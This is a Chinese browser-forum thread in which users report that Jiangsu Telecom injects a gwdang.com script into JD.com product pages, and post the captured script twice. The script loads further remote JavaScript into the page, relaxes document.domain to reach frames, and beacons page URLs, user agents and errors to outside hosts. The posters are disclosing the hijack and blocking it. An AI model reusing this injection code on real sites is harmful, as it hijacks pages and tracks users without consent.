moomin
小狐狸
小狐狸
  • UID35147
  • 注册日期2011-01-26
  • 最后登录2018-05-24
  • 发帖数87
  • 经验43枚
  • 威望0点
  • 贡献值12点
  • 好评度0点
  • 社区居民
  • 忠实会员
阅读:3182回复:2

江苏电信劫持京东产品详细页

楼主#
更多 发布于:2015-09-29 22:03
例如污染的网址http://item.jd.com/1779807.html

使用的劫持脚本
http://browser.gwdang.com/js/loader-jsdx.js


刷新后依然有
投诉电信说72小时联系
受不了,先直接ADB屏蔽了.

(function() {
  'use strict'
  new Image().src = 'http://browser.gwdang.com/visit/?action=track:loader-jsdx&random=' + Math.random()
  if (window.GOUWUDEXE) return
  window.GOUWUDEXE = 'gwdangjsid'
  
  var trytimes = 0;
  window.onerror = function(message, url, line) {
    if (!url) return;
    var msg = {};
    //璁板綍瀹㈡埛绔幆澧�
    msg.ua = window.navigator.userAgent;
    //鍙褰昺essage閲岀殑message灞炴€у氨濂戒簡锛�
    //閿欒淇℃伅鍙兘浼氭瘮杈冩櫐娑╋紝鏈変簺淇℃伅瀹屽叏鏃犵敤锛屽簲閰屾儏杩囨护
    msg.message = message.message;
    msg.url = url;
    msg.line = line;
    msg.page = window.location.href;
    var s = [];
    //灏嗛敊璇俊鎭浆鎹㈡垚瀛楃涓�
    for (var key in msg) {
      s.push(key + '=' + msg[key]);
    }
    s = s.join('&');
    //杩欓噷鏄敤澧炲姞鏍囩鐨勬柟娉曡皟鐢ㄦ棩蹇楁敹闆嗘帴鍙o紝浼樼偣鏄瘮杈冪畝娲併€�
    log(encodeURIComponent(s))
  };
  
  function _inject2(b) {
    var protocol = location.protocol === 'https:' ? 'https:' : 'http:'
    var s = document.createElement("script")
    s.type = "text/javascript"
    s.charset = "utf-8"
    s.src = protocol + '//browser.gwdang.com/get.js?f=/js/gwdang-notifier-jsdx.js'
      // s.src = 'http://127.0.0.1:8080/dest/gwdang-notifier-jsdx.all.js'
    s.onerror = function() {
      log('srcerror')
    }
    b.appendChild(s)
  }
  function cnz(){
    var b = document.body;
    var script = document.createElement('script');
    script.src = "http://s4.cnzz.com/z_stat.php?id=1256288985&web_id=1256288985";
    script.async = true;
    script.defer = true;
    script.language="JavaScript";
    b.appendChild(script);
  }
  function log(s) {
    var img = document.createElement('img')
    img.src = 'http://browser.gwdang.com/log-xdsj.js?type=' + s
  }
  
  function inject2(w) {
    if (location.host.indexOf('jd.com') > 0) document.domain = 'jd.com'
    if (trytimes > 20) {
      log('20times');
      if (document.body) _inject2(document.body)
      return;
    }
    if (trytimes > 10) {
      try {
        w.document
      } catch (e) {
        var hosts = location.host.split('.')
        var domain = hosts[hosts.length - 2] + '.' + hosts[hosts.length - 1]
        document.domain = domain;
      }
    }
    trytimes++
  
    if (!w) return
    try {
      if (w && w.document && w.document.body && w.document.body.getElementsByTagName('div').length) _inject2(w.document.body)
      else setTimeout(function() {
        inject2(w)
      }, 300)
    } catch (e) {
      setTimeout(function() {
        inject2(w)
      }, 300)
    }
  }
  
  function inject1() {
    if (trytimes > 10) {
      log('inject1');
      return;
    }
    trytimes++
    if (document.getElementById('m')) inject2(document.getElementById('m').contentWindow)
    else setTimeout(inject1, 300)
  }
  
  setTimeout(function() {
    try {
      inject1()
      cnz()
    } catch (e) {
      log(e.message)
    }
  }, 1200)
})()
fang5566
管理员
管理员
  • UID3719
  • 注册日期2005-03-07
  • 最后登录2024-11-19
  • 发帖数18487
  • 经验4842枚
  • 威望5点
  • 贡献值4320点
  • 好评度1117点
  • 社区居民
  • 最爱沙发
  • 忠实会员
  • 终身成就
1楼#
发布于:2015-09-29 23:33
投诉工信部保管一个准
Firefox More than meets your experience
network
小狐狸
小狐狸
  • UID55446
  • 注册日期2017-02-03
  • 最后登录2022-02-08
  • 发帖数75
  • 经验35枚
  • 威望0点
  • 贡献值32点
  • 好评度0点
2楼#
发布于:2017-02-04 10:53
这个劫持脚本还在,还能打开查看

(function() {
  'use strict'
  new Image().src = 'http://browser.gwdang.com/visit/?action=track:loader-jsdx&random=' + Math.random()
  if (window.GOUWUDEXE) return
  window.GOUWUDEXE = 'gwdangjsid'
 
  var trytimes = 0;
  window.onerror = function(message, url, line) {
    if (!url) return;
    var msg = {};
    //记录客户端环境
    msg.ua = window.navigator.userAgent;
    //只记录message里的message属性就好了,
    //错误信息可能会比较晦涩,有些信息完全无用,应酌情过滤
    msg.message = message.message;
    msg.url = url;
    msg.line = line;
    msg.page = window.location.href;
    var s = [];
    //将错误信息转换成字符串
    for (var key in msg) {
      s.push(key + '=' + msg[key]);
    }
    s = s.join('&');
    //这里是用增加标签的方法调用日志收集接口,优点是比较简洁。
    log(encodeURIComponent(s))
  };
 
  function _inject2(b) {
    var protocol = location.protocol === 'https:' ? 'https:' : 'http:'
    var s = document.createElement("script")
    s.type = "text/javascript"
    s.charset = "utf-8"
    s.src = protocol + '//browser.gwdang.com/get.js?f=/js/gwdang-notifier-jsdx.js'
      // s.src = 'http://127.0.0.1:8080/dest/gwdang-notifier-jsdx.all.js'
    s.onerror = function() {
      log('srcerror')
    }
    b.appendChild(s)
  }
  function cnz(){
    var b = document.body;
    var script = document.createElement('script');
    script.src = "http://s4.cnzz.com/z_stat.php?id=1256288985&web_id=1256288985";
    script.async = true;
    script.defer = true;
    script.language="JavaScript";
    b.appendChild(script);
  }
  function log(s) {
    var img = document.createElement('img')
    img.src = 'http://browser.gwdang.com/log-xdsj.js?type=' + s
  }
 
  function inject2(w) {
    if (location.host.indexOf('jd.com') > 0) document.domain = 'jd.com'
    if (trytimes > 20) {
      log('20times');
      setTimeout(function(){
        if (document.body) _inject2(document.body)
      },3000)
      return;
    }
    if (trytimes > 10) {
      try {
        w.document
      } catch (e) {
        var hosts = location.host.split('.')
        var domain = hosts[hosts.length - 2] + '.' + hosts[hosts.length - 1]
        document.domain = domain;
      }
    }
    trytimes++
 
    if (!w) return
    try {
      if (w && w.document && w.document.body && w.document.body.getElementsByTagName('div').length) _inject2(w.document.body)
      else setTimeout(function() {
        inject2(w)
      }, 300)
    } catch (e) {
      setTimeout(function() {
        inject2(w)
      }, 300)
    }
  }
 
  function inject1() {
    if (trytimes > 10) {
      log('inject1');
      return;
    }
    trytimes++
    if (document.getElementById('m')) inject2(document.getElementById('m').contentWindow)
    else setTimeout(inject1, 300)
  }
 
  setTimeout(function() {
    try {
      inject1()
      cnz()
    } catch (e) {
      log(e.message)
    }
  }, 1200)
})()
游客

返回顶部